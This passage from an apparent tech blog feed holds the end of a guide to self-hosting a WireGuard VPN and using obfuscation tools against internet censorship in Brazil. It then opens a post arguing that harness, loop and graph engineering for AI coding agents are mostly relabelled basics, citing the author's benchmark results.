<p><strong>5. Start the container:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run -d <span class="se">\
</span></span></span><span class="line"><span class="cl">  --name<span class="o">=</span>wg-easy <span class="se">\
</span></span></span><span class="line"><span class="cl">  -e <span class="nv">WG_HOST</span><span class="o">=</span>YOUR_IP <span class="se">\
</span></span></span><span class="line"><span class="cl">  -e <span class="nv">PASSWORD_HASH</span><span class="o">=</span><span class="s1">&#39;$$2b$$12$$abc...&#39;</span> <span class="se">\
</span></span></span><span class="line"><span class="cl">  -v ~/.wg-easy:/etc/wireguard <span class="se">\
</span></span></span><span class="line"><span class="cl">  -p 51820:51820/udp <span class="se">\
</span></span></span><span class="line"><span class="cl">  -p 51821:51821/tcp <span class="se">\
</span></span></span><span class="line"><span class="cl">  --cap-add<span class="o">=</span>NET_ADMIN <span class="se">\
</span></span></span><span class="line"><span class="cl">  --sysctl<span class="o">=</span><span class="s2">&#34;net.ipv4.conf.all.src_valid_mark=1&#34;</span> <span class="se">\
</span></span></span><span class="line"><span class="cl">  --sysctl<span class="o">=</span><span class="s2">&#34;net.ipv4.ip_forward=1&#34;</span> <span class="se">\
</span></span></span><span class="line"><span class="cl">  --restart unless-stopped <span class="se">\
</span></span></span><span class="line"><span class="cl">  ghcr.io/wg-easy/wg-easy</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>6. Open the firewall.</strong> Port 51820/UDP is the tunnel itself. Port 51821/TCP is the panel: <strong>do not leave the panel exposed to the internet</strong>. The right way is to open it only through an SSH tunnel (<code>ssh -L 51821:localhost:51821 root@YOUR_IP</code> and browse to <code>localhost:51821</code>), or to open 51821 just long enough to create your clients and close it right after.</p>
<p><strong>7. Create the clients.</strong> In the panel, one click generates a client with a QR code. Point the official WireGuard app (Android/iOS) camera at it and you are done. On a laptop, download the config file and import it into the WireGuard client.</p>
<p>Done: all of your device&rsquo;s traffic exits through your European server. Your Brazilian ISP sees only a scrambled flow to some random IP in Germany.</p>
<h3>And on your machine, how do you use it?<span class="hx:absolute hx:-mt-20" id="and-on-your-machine-how-do-you-use-it"></span>
    <a href="#and-on-your-machine-how-do-you-use-it" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>The server is half the story. On your device, the ritual goes like this:</p>
<p><strong>On your phone (Android/iOS):</strong> install the official <a href="https://www.wireguard.com/install/"target="_blank" rel="noopener">WireGuard</a> app from the store (or from F-Droid on Android). Tap the <strong>&quot;+&quot;</strong>, choose &ldquo;Scan from QR code&rdquo; and point it at the code the wg-easy panel showed. A new &ldquo;tunnel&rdquo; appears in the list: one tap on the switch and you are in. On iOS, enable &ldquo;On-Demand&rdquo; in the tunnel settings so it reconnects by itself when you switch networks (Wi-Fi to 4G, for instance).</p>
<p><strong>On your laptop (Windows/macOS):</strong> download the official WireGuard client for your system, click &ldquo;Import tunnel(s) from file&rdquo; and select the <code>.conf</code> you downloaded from the panel. One click on &ldquo;Activate&rdquo; and done. Important detail: the official client has a <strong>&ldquo;Block untunneled traffic&rdquo;</strong> option (the kill switch): turn it on. If the tunnel drops, your internet stops instead of leaking through your real IP.</p>
<p><strong>On Linux:</strong> copy the <code>.conf</code> to <code>/etc/wireguard/wg0.conf</code> and bring it up with <code>sudo wg-quick up wg0</code> (plus <code>sudo systemctl enable wg-quick@wg0</code> to start it at boot). Or import the file straight into NetworkManager through the graphical interface, if you prefer clicking to typing.</p>
<p>A complete client <code>.conf</code>, for reference, looks like this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-ini" data-lang="ini"><span class="line"><span class="cl"><span class="k">[Interface]</span>
</span></span><span class="line"><span class="cl"><span class="na">PrivateKey</span> <span class="o">=</span> <span class="s">&lt;THIS device&#39;s private key&gt;</span>
</span></span><span class="line"><span class="cl"><span class="na">Address</span> <span class="o">=</span> <span class="s">10.10.0.2/32</span>
</span></span><span class="line"><span class="cl"><span class="na">DNS</span> <span class="o">=</span> <span class="s">1.1.1.1</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">[Peer]</span>
</span></span><span class="line"><span class="cl"><span class="na">PublicKey</span> <span class="o">=</span> <span class="s">&lt;server public key&gt;</span>
</span></span><span class="line"><span class="cl"><span class="na">Endpoint</span> <span class="o">=</span> <span class="s">SERVER_IP:51820</span>
</span></span><span class="line"><span class="cl"><span class="na">AllowedIPs</span> <span class="o">=</span> <span class="s">0.0.0.0/0</span>
</span></span><span class="line"><span class="cl"><span class="na">PersistentKeepalive</span> <span class="o">=</span> <span class="s">25</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Two details worth their weight in gold here. <code>PersistentKeepalive = 25</code> keeps the tunnel alive when you are behind NAT (home network, 4G), preventing the connection from silently dying. And <code>AllowedIPs = 0.0.0.0/0</code> is what pushes <strong>all</strong> traffic into the tunnel; without it, only traffic to the VPN&rsquo;s own IPs goes out encrypted. (The <code>DNS =</code> line works fine on Windows, macOS and phones; on Linux with systemd-resolved it can get in the way, as I explain in the common mistakes below.)</p>
<p><strong>Checking that it worked:</strong> with the tunnel active, run <code>curl ifconfig.me</code> in a terminal (or open <code>ipleak.net</code> in the browser). It must show your VPS IP, not your home one. If your network has IPv6, check separately with <code>curl -4 ifconfig.me</code> and <code>curl -6 ifconfig.me</code>: <strong>both</strong> must show the server. And visit <code>dnsleaktest.com</code>: DNS must exit through the tunnel too. If your ISP&rsquo;s DNS server shows up, there is a leak to fix.</p>
<p><strong>Minimum maintenance:</strong> enable <code>unattended-upgrades</code> so the system patches itself, use SSH keys instead of passwords, and install nothing else on that machine. Small surface, small risk.</p>
<h3>The 2026 way to do this: let the AI configure it<span class="hx:absolute hx:-mt-20" id="the-2026-way-to-do-this-let-the-ai-configure-it"></span>
    <a href="#the-2026-way-to-do-this-let-the-ai-configure-it" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>If you got stuck on some step, remember it is 2026: you no longer need to master every command in this guide. I went down that path myself. I rented the VPS, handed the SSH access to the AI agent and asked for the full setup; on the other side, on my own machine, it imported the <code>.conf</code>, brought up <code>wg-quick</code>, enabled it at boot and checked for leaks at the end. Today my server is a reproducible Ansible playbook (kill the VPS, spin up another, run one command) and my laptop&rsquo;s config follows the same pattern. All in <strong>private</strong> repositories, private on purpose: VPN configuration is not the sort of thing I want strangers peeking at.</p>
<p><img src="gitea-my-vpnserver.png" alt="My private Gitea repository with the server’s Ansible playbook: “Private” badge, roles, group_vars and an operations README"  loading="lazy" /></p>
<p><em>Mine, running on my own Gitea: private, versioned, and the whole server comes back up with one command.</em></p>
<p>And if you are going to ask an AI to configure it, skip the generic &ldquo;install me a VPN&rdquo; and hand over the real requirements. Something like this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Turn this fresh Ubuntu 24.04 VPS into a robust WireGuard server,
</span></span><span class="line"><span class="cl">preferably through an idempotent Ansible playbook (I want to be able to
</span></span><span class="line"><span class="cl">destroy the VPS and recreate everything by running one command).
</span></span><span class="line"><span class="cl">Requirements:
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">- WireGuard managed by wg-quick@wg0, server key generated on the server
</span></span><span class="line"><span class="cl">  itself (mode 0600), no exposed web panel
</span></span><span class="line"><span class="cl">- Dual-stack tunnel: IPv4 and IPv6 (fd00::/64 ULA subnet with NAT66), so
</span></span><span class="line"><span class="cl">  no traffic leaks outside on networks with native IPv6
</span></span><span class="line"><span class="cl">- ufw denying everything except SSH and the WireGuard UDP port
</span></span><span class="line"><span class="cl">- key-only sshd (no passwords), fail2ban on sshd, unattended-upgrades
</span></span><span class="line"><span class="cl">  with no automatic reboot
</span></span><span class="line"><span class="cl">- Peers declared as data in a config file: adding a client = adding one
</span></span><span class="line"><span class="cl">  entry and running the playbook again
</span></span><span class="line"><span class="cl">- Generate client .conf files with PersistentKeepalive=25, full-tunnel
</span></span><span class="line"><span class="cl">  AllowedIPs and QR codes via qrencode
</span></span><span class="line"><span class="cl">- At the end, print the verification commands (curl -4/-6 ifconfig.me,
</span></span><span class="line"><span class="cl">  wg show)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Finally, hand me a short operations README: how to add a client, how to
</span></span><span class="line"><span class="cl">update, when to reboot.</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The difference between a &ldquo;working&rdquo; server and a solid one lives entirely in those requirements: dual-stack, closed firewall, passwordless sshd, peers as data, reproducibility. The technical barrier of this entire article has, in practice, become a conversation.</p>
<h3>Common mistakes (and how to avoid them)<span class="hx:absolute hx:-mt-20" id="common-mistakes-and-how-to-avoid-them"></span>
    <a href="#common-mistakes-and-how-to-avoid-them" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>I keep seeing the same stumbles whenever someone sets up their first self-hosted VPN. All avoidable:</p>
<ul>
<li><strong>Exposing the wg-easy panel to the internet.</strong> The number one classic mistake. The panel is the key to the vault: open on port 51821, any botnet scan finds it within hours. SSH tunnel always, open port never.</li>
<li><strong>Weak or recycled passwords on the panel and SSH.</strong> An entire VPN protected by <code>changeme123</code> is worse than no VPN. And disable SSH password login for good (<code>PasswordAuthentication no</code> in <code>sshd_config</code>) once your key is set up.</li>
<li><strong>Thinking you are anonymous because the IP is &ldquo;yours&rdquo;.</strong> The VPS is in your name, paid with your card. It protects you from mass blocking, not from an investigation with your name on it. The wrong level of paranoia creates a false sense of security, which is worse than none.</li>
<li><strong>A VPS in Brazil or from a Brazilian company.</strong> I have seen people build a &ldquo;privacy VPN&rdquo; on a national provider. If the court order arrives in the same country, you did not leave the reach, you just changed shelves. Server abroad, jurisdiction abroad.</li>
<li><strong>Handing out access to half the world.</strong> Each extra person is one more device, one more usage pattern, one more mouth. Close family, fine; a 40-contact group, no. The more people on the same IP, the faster it lands on some list.</li>
<li><strong>Using the same machine for other things.</strong> Personal blog, Telegram bot, seedbox: all of that grows the attack surface and ties together identities you wanted separate. The VPN VPS is for the VPN only.</li>
<li><strong>Trusting without testing for leaks.</strong> After setting up, test: <code>ipleak.net</code> or <code>dnsleaktest.com</code> with the VPN on. If your real IP or your ISP&rsquo;s DNS shows up, something is wrong, and this is the only way you find out.</li>
<li><strong>Forgetting IPv6.</strong> This one got even me: an IPv4-only tunnel on a network with native IPv6, and all the v6 traffic goes around the VPN, in the clear, without you noticing. Either the tunnel is dual-stack, or half of your traffic leaks. Test with <code>curl -6 ifconfig.me</code>.</li>
<li><strong>The <code>DNS =</code> line breaking the Linux client.</strong> On systemd-resolved systems (Ubuntu, Fedora and the like), <code>wg-quick</code> calls openresolv to write the DNS, openresolv refuses to touch the <code>/etc/resolv.conf</code> owned by systemd-resolved (&ldquo;signature mismatch&rdquo; error) and the whole interface fails to come up. If your system DNS already works fine, just remove the line: queries ride the tunnel anyway.</li>
<li><strong>Losing the printer, the NAS and the local network.</strong> With <code>AllowedIPs = 0.0.0.0/0</code>, even traffic inside your own home tries to go through the tunnel. The fix is a policy routing rule evaluated before WireGuard&rsquo;s own rules: <code>PostUp = ip rule add to 192.168.0.0/16 lookup main priority 1000</code> (plus the matching <code>PostDown</code> to undo it on shutdown).</li>
<li><strong>Chaining <code>wg-quick down &amp;&amp; up</code>.</strong> <code>down</code> returns an error when the interface is already down, and with <code>&amp;&amp;</code> the <code>up</code> never runs. Run <code>up</code> on its own.</li>
<li><strong>Installing and abandoning.</strong> A server without updates for a year is a server with known vulnerabilities. And test the connection from time to time: what works today can be fingerprinted tomorrow.</li>
<li><strong>No backup of the configuration.</strong> The <code>~/.wg-easy</code> directory holds everything (keys, clients). Keep an encrypted local copy. If the VPS dies or gets shut down by the provider, you bring another one up in ten minutes instead of starting from zero.</li>
</ul>
<blockquote>
  <p><strong>Keep this:</strong> a US$ 5 VPS outside Brazil running WireGuard gets you out of any mass block based on catalogued IPs. The price is your signup record at the provider: acceptable against blocking, insufficient against a named investigation.</p>

</blockquote>
<h2>The invisible enemy: DPI<span class="hx:absolute hx:-mt-20" id="the-invisible-enemy-dpi"></span>
    <a href="#the-invisible-enemy-dpi" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>So far I have assumed the censor blocks <strong>addresses</strong>. Their next level is blocking <strong>formats</strong>, and that is where deep packet inspection (DPI) lives.</p>
<p>Even encrypted, a VPN tunnel has a signature. The initial handshake of WireGuard and OpenVPN has characteristic packet sizes, sequences and timings. The content is unreadable, but the shape screams &ldquo;I am a VPN&rdquo;. China does exactly this at national scale: it does not need to read your traffic, it only needs to recognize the protocol and drop the connection.</p>
<blockquote>
  <p><strong>Keep this:</strong> the censor does not need to read your traffic to block you. Recognizing the tunnel&rsquo;s shape is enough. That is why obfuscation exists.</p>

</blockquote>
<p>The technical answer is <strong>obfuscation</strong>: making the tunnel look like something else.</p>
<ul>
<li><strong><a href="https://amnezia.org/"target="_blank" rel="noopener">AmneziaWG</a></strong>: a WireGuard fork that injects junk packets and scrambles headers until the signature vanishes. Same audited WireGuard base, free apps for every platform, and it points at the same kind of VPS from Phase 2. If you set up wg-easy, migrating to Amnezia is the natural step when DPI arrives.</li>
<li><strong>udp2raw</strong>: wraps WireGuard&rsquo;s UDP traffic inside fake TCP packets that look like an ordinary connection.</li>
<li><strong>Shadowsocks</strong>: born in China precisely for this, an encrypted proxy designed to have no recognizable signature.</li>
</ul>
<p>Notice we are still talking about free tools and a US$ 5 VPS. The cost rises for the censor much faster than for you.</p>
<h2>Phase 3: when even your VPS is not enough<span class="hx:absolute hx:-mt-20" id="phase-3-when-even-your-vps-is-not-enough"></span>
    <a href="#phase-3-when-even-your-vps-is-not-enough" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If the scenario degrades to national DPI with protocol blocking, the game becomes heavy camouflage and redundancy. The real options, in order of effort:</p>
<p><strong>Protocols that disguise themselves as ordinary HTTPS.</strong> The current state of the art is <strong>VLESS with Reality</strong> (from the Xray-core project): your traffic presents itself as a legitimate TLS 1.3 connection to a real, innocent website, with certificate, handshake and packet pattern indistinguishable from a normal visit. To block you, the censor would have to block the innocent site too, and the collateral damage is the defense. <strong>Trojan-Go</strong> follows a similar philosophy. <strong>Outline</strong>, from Jigsaw (Google), packages Shadowsocks with a friendly manager if you want to hand out access to family and friends.</p>
<p><strong>Tor with bridges.</strong> Plain Tor is blocked by default in censoring countries, but obfs4 bridges and Snowflake were tailor-made for that scenario: Snowflake disguises your entry into the Tor network as an ordinary WebRTC video call. It is slow, forget streaming, but it is the hardest network to extinguish in existence, maintained precisely for journalists and activists in hostile countries.</p>
<p><strong>Redundancy and rotation.</strong> Two or three cheap VPSs at different providers, with automatic failover. If one lands on a blacklist, you switch in minutes: new instance, new IP. Your cost: another US$ 5. The censor&rsquo;s cost: find and block it again, every time.</p>
<p><strong>Alternative access.</strong> Starlink and other satellite links leave the national ground infrastructure entirely. As long as they are not regulated as well, they are the physical last resort. And for extreme cases, the usual sneakernet: thumb drive, external disk, physical copies.</p>
<p><strong>Client-side hygiene</strong>, valid in every phase:</p>
<ul>
<li><strong>Kill switch on</strong>: if the tunnel drops, the device cuts the internet instead of leaking through your real IP.</li>
<li><strong>DNS leak protection</strong>: your DNS queries must go through the tunnel, otherwise your ISP keeps seeing every site you visit.</li>
<li><strong>WebRTC disabled in the browser</strong> (or use an extension): it leaks your real IP even with the VPN on.</li>
<li><strong>VPN on when needed, not always</strong>: a 24/7 usage pattern becomes a behavioral signature of its own.</li>
</ul>
<p>And the usual honest notes: running your own server for personal use is legal; using it to commit crimes is not. And since 2026, with the new sentence enhancement, &ldquo;using a VPN&rdquo; weighs on the sentence of any crime you would commit anyway. Keep the surface small, test your connectivity from inside Brazil regularly (what works today can be fingerprinted tomorrow), have a plan B (a second VPS, a Tor profile with bridges) and keep offline copies of everything critical.</p>
<p><strong>Realistic assessment:</strong> no solution is permanent against a determined, well-funded censor. The goal here is different: make mass blocking expensive until it becomes a bad deal, technically and politically. A country that needs to take down half of the legitimate internet to silence half a dozen voices has a public relations problem, not a technology one. That cost is where we place our bet.</p>
<blockquote>
  <p><strong>Keep this:</strong> the staircase is commercial VPN, then your own VPN, then obfuscated protocol, then Tor with bridges, then satellite. Each step raises your cost a little and the censor&rsquo;s a lot. Start climbing before you need to.</p>

</blockquote>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The Brazilian pattern is what I called censorship by accumulation: no single step looks like the end of the world, and each comes with its little plaque of good intentions. But blocking infrastructure, once built, has no moral owner: it serves today&rsquo;s government and tomorrow&rsquo;s, against today&rsquo;s target and against you.</p>
<p>Free communication infrastructure works exactly the same: also built by accumulation, also brick by brick. A commercial VPN configured today. Your own VPS tomorrow. An obfuscated protocol in the drawer for when it is needed. None of this is paranoia. It works like backups: you do not wait for the disk to fail before starting.</p>
<p>And if you want to follow this frontier closely, a personal recommendation: follow <a href="https://x.com/ayubio"target="_blank" rel="noopener">Ayub</a>. He is the best source on internet infrastructure and state censorship in Brazil today. He was the one who <a href="https://x.com/ayubio/status/2058990595503509513"target="_blank" rel="noopener">sounded the alarm about the VPN criminalization in bill PL 3066/2025</a> months before it became law. And in recent days he has been covering two things the mainstream press barely touched: the handover of over R$ 100 billion in public networks, ducts and federal properties to the carriers and BTG Pactual, and the technical apparatus of the new Marco Civil regulation, which according to him gave Anatel <a href="https://rendageek.com.br/noticias/marco-civil-da-internet-novas-regras/"target="_blank" rel="noopener">remote access to ISPs&rsquo; edge routers</a>. He posts in Portuguese, but your browser&rsquo;s translator handles it. Required reading to understand where the next step of the staircase comes from.</p>
<p>The best time to build your tunnel was before you needed it. The second best time is now.</p>
]]></content:encoded><category>networking</category><category>security</category><category>law-and-regulation</category></item><item><title>Hot Take: Harness, Loop Engineering, Graph Engineering Are Bullshit</title><link>https://www.akitaonrails.com/en/2026/08/18/hot-take-harness-loop-engineering-graph-engineering-are-bullshit/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/18/hot-take-harness-loop-engineering-graph-engineering-are-bullshit/</guid><pubDate>Tue, 18 Aug 2026 13:00:00 GMT</pubDate><description>&lt;p&gt;&lt;a href="https://x.com/AkitaOnRails/status/2089734682325794897"target="_blank" rel="noopener"&gt;&lt;img src="tweet-hot-take.png" alt="Hot take on X: Harness, Loop Engineering, and Graph Engineering are all bullshit to sell more consulting hours and courses" loading="lazy" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I posted &lt;a href="https://x.com/AkitaOnRails/status/2089734682325794897"target="_blank" rel="noopener"&gt;this tweet&lt;/a&gt; this morning and it struck a nerve. The full point: when the technology itself becomes a commodity, the money migrates to taxonomy. They invent five new names for chaining API calls and suddenly there&amp;rsquo;s a certification that expires in six months.&lt;/p&gt;
&lt;p&gt;Let me back up the provocation properly, because it&amp;rsquo;s not a gratuitous jab.&lt;/p&gt;</description><content:encoded><![CDATA[<p><a href="https://x.com/AkitaOnRails/status/2089734682325794897"target="_blank" rel="noopener"><img src="tweet-hot-take.png" alt="Hot take on X: Harness, Loop Engineering, and Graph Engineering are all bullshit to sell more consulting hours and courses"  loading="lazy" /></a></p>
<p>I posted <a href="https://x.com/AkitaOnRails/status/2089734682325794897"target="_blank" rel="noopener">this tweet</a> this morning and it struck a nerve. The full point: when the technology itself becomes a commodity, the money migrates to taxonomy. They invent five new names for chaining API calls and suddenly there&rsquo;s a certification that expires in six months.</p>
<p>Let me back up the provocation properly, because it&rsquo;s not a gratuitous jab.</p>
<p>Let me preempt the standard comment: <em>&ldquo;but it works for me.&rdquo;</em> Good for you — honestly. Except &ldquo;it works for me&rdquo; never proved the ceremony is what made it work. What made it work is you knowing what you wanted. The ceremony just happened to be in the room.</p>
<h2>My receipt<span class="hx:absolute hx:-mt-20" id="my-receipt"></span>
    <a href="#my-receipt" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Between January and May I ran an <a href="/en/2026/05/14/wrapping-up-my-ai-marathon-success-or-failure/">AI marathon</a> and published <a href="https://github.com/akitaonrails?tab=repositories"target="_blank" rel="noopener">over 30 public repositories</a>. There are tools I use every day — <a href="https://github.com/akitaonrails/ai-memory"target="_blank" rel="noopener">ai-memory</a>, <a href="https://github.com/akitaonrails/ai-usagebar"target="_blank" rel="noopener">ai-usagebar</a>, <a href="https://github.com/akitaonrails/ai-jail"target="_blank" rel="noopener">ai-jail</a> — and personal apps built to scratch my own itch: <a href="https://github.com/akitaonrails/frank_mangaplus"target="_blank" rel="noopener">Frank Manga+</a>, <a href="https://github.com/akitaonrails/frank_scanlation"target="_blank" rel="noopener">Frank Scanlation</a>, <a href="https://github.com/akitaonrails/frank_geary"target="_blank" rel="noopener">Frank Geary</a>, and so on.</p>
<p>You know what I never once felt the urge to do in all that time? Complicate my AI setup. I don&rsquo;t have a super-customized <a href="/en/2026/05/25/first-impressions-using-oh-my-pi-and-opencode/">Pi</a>, no Hermes, no orchestrated agent graph, no numbered-spec pipeline. Thanks to ai-memory, <strong>I swap harnesses like I swap underwear</strong>: daily, no drama. Claude Code in the morning, Codex in the afternoon, Kimi CLI at night — the project memory travels with me, so the harness becomes a detail.</p>
<p>And detail is the point. Most harnesses are optimized for their own company&rsquo;s LLM. But &ldquo;optimized&rdquo; doesn&rsquo;t mean &ldquo;magic,&rdquo; and I have data on that.</p>
<h2>What my benchmark says about harnesses<span class="hx:absolute hx:-mt-20" id="what-my-benchmark-says-about-harnesses"></span>
    <a href="#what-my-benchmark-says-about-harnesses" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>In <a href="/en/2026/08/15/llm-benchmarks-qwen-3-8-glm-5-3-gemini-3-7/">my LLM Coding Benchmark</a> I run the same models through different harnesses under controlled conditions. The result is the opposite of what the course market implies:</p>
<ul>
<li><strong>For a weak model, the harness rescues.</strong> Grok 4.3 built nothing on bare opencode (18 points) and delivered a real app on the grok CLI (55). Gemini 3.1 Pro went from 62 to 88 on Google&rsquo;s own harness — but the problem there was an OpenRouter transport bug, not a lack of &ldquo;harness engineering.&rdquo;</li>
<li><strong>For a frontier model, the harness is noise.</strong> Grok 4.5: 92 on opencode, 91 on the grok CLI. Grok 4.6: 92 and 93. A one-point difference, inside the margin of error. No amount of harness engineering moves a good model.</li>
<li><strong>Where the harness actually bites is your wallet.</strong> The Grok 4.6 run cost $1.19 on the grok CLI versus $6.33 on opencode via OpenRouter — <strong>over 5x cheaper</strong> for the same ~11 million tokens, because the official CLI uses xAI&rsquo;s native prompt caching. Same story on Codex: GPT 5.6 Terra cost $6.77 blended because 21 of its 21.7 million tokens were cache hits; Sol, same family, same score, cost about $45.</li>
</ul>
<p>So yes, picking a decent harness matters — for cost, and to give structure to a weak model. But that&rsquo;s an afternoon of reading docs and watching your token bill, not a new discipline with a learning track.</p>
<p>Since I mentioned Hermes up there, it&rsquo;s worth explaining: <a href="https://github.com/NousResearch/hermes-agent"target="_blank" rel="noopener">Hermes Agent</a> is an open-source framework from Nous Research for building <em>your own</em> personal agent — you define the tools, write the loops, configure per-model routing, local/cloud fallback, Telegram and Discord gateways, and it even &ldquo;learns skills&rdquo; from use. It&rsquo;s paradise for the setup crowd.</p>
<p>It&rsquo;s also a second job: every one of those pieces becomes yours to maintain, update, and debug, forever. And at the end of the day the engine is still the same Claude, GPT, or Qwen everyone else has — the custom chassis doesn&rsquo;t improve the engine. What Hermes actually solves, context continuity across sessions and tools, a decent harness with something like ai-memory already covers — without you becoming the infrastructure administrator of your own assistant.</p>
<p>If you want an assistant on your own hardware as a hobby or for privacy, that&rsquo;s a great reason, go for it. As a productivity prerequisite, it&rsquo;s not one.</p>
<blockquote>
  <p><strong>Remember this:</strong> a good harness is one that charges less and stays out of the way. The rest is the model. And a good model doesn&rsquo;t need &ldquo;harness engineering&rdquo; — at most it needs the transport not to be broken.</p>

</blockquote>
<h2>Loop Engineering, Graph Engineering, Spec-Driven Development<span class="hx:absolute hx:-mt-20" id="loop-engineering-graph-engineering-spec-driven-development"></span>
    <a href="#loop-engineering-graph-engineering-spec-driven-development" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>On to the names, because they describe real things — just tiny ones.</p>
<p><strong>Loop Engineering</strong> is this season&rsquo;s name for designing the cycle an agent repeats: execute, verify against evidence, iterate until a stop condition. The guides list real failure modes — the agent declaring &ldquo;done&rdquo; too early, the goal drifting on each pass. But the recommended mitigation is &ldquo;an independent verifier checking objective evidence.&rdquo; That&rsquo;s had a name for fifty years: <strong>tests and code review</strong>. An agent in a loop with a test suite is the same old basics with a new name.</p>
<p><strong>Graph Engineering</strong> is drawing the agent&rsquo;s workflow as an explicit graph of nodes, branches, and joins — LangChain has <a href="https://www.langchain.com/blog/3-years-of-graph-engineering-with-langgraph"target="_blank" rel="noopener">three years of that story</a>. It makes sense when the flow is genuinely branched. Except the overwhelming majority of projects is a straight line with an <code>if</code> in the middle. Modeling that as a graph is buying a giant whiteboard to draw one arrow.</p>
<p><strong>Spec-Driven Development</strong> is writing a detailed specification first and treating the code as an artifact generated from it — the spec becomes the &ldquo;source of truth&rdquo; and the code, a byproduct. Hold that thought, the strong argument is coming right up.</p>
<p>Notice the pattern: each name takes a real, small practice — looping with verification, drawing a flow, writing down what you want before building — and inflates it into a &ldquo;discipline.&rdquo; The inflation is the product. A new name creates a course, the course creates a certification, the certification expires in six months and sells you the recertification.</p>
<p>To be fair: the serious guides on these topics already carry the caveat — the most-read <a href="https://www.aibuilderclub.com/blog/graph-engineering-guide-2026"target="_blank" rel="noopener">graph engineering guide</a> says outright that &ldquo;you probably don&rsquo;t need it&rdquo; and tells you to master the loop before opening a graph, and LangChain has a whole &ldquo;when not to use graphs&rdquo; section. The guides are right; the damage comes from the funnel, which throws away the caveat and sells the rest as everyone&rsquo;s default.</p>
<p>The two that sell the most courses — heavy agent orchestration and spec-driven development — deserve more than definitions. They deserve the argument.</p>
<h2>The strong argument against super-orchestration<span class="hx:absolute hx:-mt-20" id="the-strong-argument-against-super-orchestration"></span>
    <a href="#the-strong-argument-against-super-orchestration" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>There&rsquo;s simple math that orchestrated-agent diagrams never show. If each step of your pipeline succeeds 90% of the time — and that&rsquo;s optimistic — a ten-agent chain succeeds 0.9^10, or <strong>~35% of the time</strong>. Every node is a new failure point, and every edge is tokens spent on agents talking to agents instead of working.</p>
<p>You don&rsquo;t have to take the math on faith: I accidentally measured it in the benchmark. MiniMax M3 running under an orchestrator looked like Tier D, with 24 points. The same model, clean, scored 91 — Tier A. A swing of up to 69 points between harness conditions means the opposite of what the orchestration vendor claims: <strong>when the plumbing dominates the result, you stopped measuring the model and started measuring the plumbing.</strong> The best result in the entire benchmark didn&rsquo;t come from any orchestrated swarm: it came from one strong model, alone, in a simple loop — Fable 5, 96 points, Claude Code, done.</p>
